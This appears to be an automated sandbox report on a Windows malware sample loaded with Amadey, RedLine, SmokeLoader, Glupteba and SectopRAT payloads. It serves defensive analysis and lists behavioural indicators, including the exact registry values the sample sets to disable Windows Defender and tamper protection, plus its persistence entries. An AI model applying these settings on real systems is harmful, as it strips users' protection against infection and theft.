Analysis Overview
SHA256
3a38b442e5943fc91da9dfc20beba22560217bcfde63e5432220d2fc285a9635
Threat Level: Known bad
The file 3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exe was found to be: Known bad.
Malicious Activity Summary
Healer
SmokeLoader
Detects Healer, an antivirus disabler dropper
Glupteba
Suspicious use of NtCreateUserProcessOtherParentProcess
Amadey
SectopRAT
RedLine payload
Glupteba payload
Modifies Windows Defender Real-time Protection settings
RedLine
SectopRAT payload
Downloads MZ/PE file
Drops file in Drivers directory
Blocklisted process makes network request
Modifies Windows Firewall
Stops running service(s)
Reads user/profile data of web browsers
Executes dropped EXE
Windows security modification
Loads dropped DLL
Checks computer location settings
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Detected potential entity reuse from brand paypal.
Launches sc.exe
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Program crash
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious behavior: GetForegroundWindowSpam
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-03 23:57
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-03 23:57
Reported
2023-11-03 23:59
Platform
win10v2004-20231025-en
Max time kernel
91s
Max time network
153s
Command Line
Signatures
Amadey
Detects Healer, an antivirus disabler dropper
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 6200 created 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 6200 created 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 6200 created 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 6200 created 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 6200 created 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8792114.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4A79.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3DB5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3DB5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7822687.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v1106597.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\B07.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\En1HV4Ys.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uL6Fa5TM.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sd7uw5fi.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hq3gO0Jh.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 4188 set thread context of 1132 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 5864 set thread context of 916 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files (x86)\BBuster\Lang\is-3T1IN.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-TL0KN.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Plugins\is-KK536.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\is-F8NJE.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-R8CUO.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-LS9UM.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-9V5RM.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-M2P81.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-FUEO3.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\is-L3E1H.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Plugins\is-GV7JL.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-OR0GL.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-PULBH.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-7V2KS.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Help\is-1EPTQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\BBuster\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\BBuster\BBuster.exe | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-052B8.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-9VRFD.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-K0DNA.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-DAPLO.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-RUDTQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-JM5GL.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Online\is-ERGOO.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Plugins\is-0DMVE.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-O3HM8.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-E9UJ8.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-4T21D.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Online\is-AAPMC.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-1DARK.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-89G2R.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Plugins\is-6GQIU.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-QADKN.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
